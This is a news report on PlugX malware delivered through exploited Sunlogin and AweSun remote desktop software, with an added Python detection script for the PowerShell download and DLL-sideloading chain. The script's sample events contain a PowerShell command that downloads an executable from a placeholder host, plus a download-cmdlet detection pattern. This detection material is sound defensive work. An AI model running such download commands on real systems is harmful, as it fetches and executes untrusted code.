Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun have been exploited by attackers to deploy PlugX malware.
A new analysis from AhnLab Security Emergency Response Center (ASEC) shows continued exploitation of the flaws to deliver various payloads to compromised systems.
These include the Sliver post-exploitation framework, the XMRig cryptocurrency miner, Gh0st RAT, and Paradise ransomware. PlugX is the latest addition to this list.
This modular malware is widely used by China-based actors and continuously gains new features that help it take control of systems and steal information.
In the attacks observed by ASEC, once a vulnerability has been successfully exploited, PowerShell commands are executed to retrieve an executable and a DLL file from a remote server.
The executable is a legitimate HTTP server service from the cybersecurity firm ESET; it is abused to load the DLL and ultimately execute the PlugX payload in memory using a technique called DLL sideloading.
“PlugX operators use a variety of trusted binaries that are vulnerable to DLL sideloading, including a number of antivirus executables,” Security Joes noted in a September 2022 report. “This has proven effective in infecting victims.”
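Two detection heuristics for the delivery chain described above, written as an added example (not ASEC's or Security Joes' code): PowerShell spawned by a remote desktop host process with a download in its command line, and an executable outside the usual install directories loading an unsigned DLL from its own folder. The event dicts mimic Sysmon process-creation and image-load fields, and the remote desktop process names, file names and URL are constructed placeholders, since the article does not name them.

```python
import re

# Constructed host-process names for the remote desktop tools (assumptions,
# not taken from the article); adjust to what the products run as on the host.
REMOTE_DESKTOP_PARENTS = {"sunloginclient.exe", "awesun.exe"}
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
# Directories where a legitimate signed service binary is normally installed.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def dirname(path):
    return path.rsplit("\\", 1)[0].lower() + "\\"

def check_process_create(ev):
    """Stage 1: PowerShell launched by a remote desktop host process, command line fetches a file."""
    if (basename(ev["Image"]) in ("powershell.exe", "pwsh.exe")
            and basename(ev["ParentImage"]) in REMOTE_DESKTOP_PARENTS
            and DOWNLOAD_RE.search(ev.get("CommandLine", ""))):
        return f"powershell download spawned by {basename(ev['ParentImage'])}"
    return None

def check_image_load(ev):
    """Stage 2: a binary outside trusted install paths loads an unsigned DLL from its own directory."""
    exe_dir, dll_dir = dirname(ev["Image"]), dirname(ev["ImageLoaded"])
    if ev.get("Signed") == "true" or exe_dir != dll_dir or exe_dir.startswith(TRUSTED_DIRS):
        return None
    return f"possible DLL sideloading: {basename(ev['Image'])} loaded {basename(ev['ImageLoaded'])} from {exe_dir}"

def scan(events):
    """Return the alert strings raised over a sequence of event dicts."""
    checks = {"ProcessCreate": check_process_create, "ImageLoad": check_image_load}
    return [hit for ev in events if (hit := checks[ev["EventType"]](ev))]

# Constructed sample telemetry; process names, file names and URL are placeholders.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "ParentImage": r"C:\Program Files\Oray\SunloginClient.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadFile('http://placeholder.invalid/svc.exe','C:\\Users\\Public\\svc.exe')"},
    {"EventType": "ImageLoad", "Image": r"C:\Users\Public\svc.exe",
     "ImageLoaded": r"C:\Users\Public\placeholder.dll", "Signed": "false"},
    {"EventType": "ImageLoad", "Image": r"C:\Program Files\Vendor\svc.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
]

print(*scan(SAMPLE_EVENTS), sep="\n")
```

The second heuristic will also fire on benign software run from user-writable folders, so it is a triage signal to pair with the first, not an alert on its own.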
The backdoor is also capable of starting arbitrary services, downloading and executing files from external sources, and dropping plugins that can collect data and propagate using Remote Desktop Protocol (RDP). These are noteworthy new features added to PlugX, ASEC said. “Once the PlugX backdoor is installed, the attacker gains control over the infected system without the user’s knowledge.”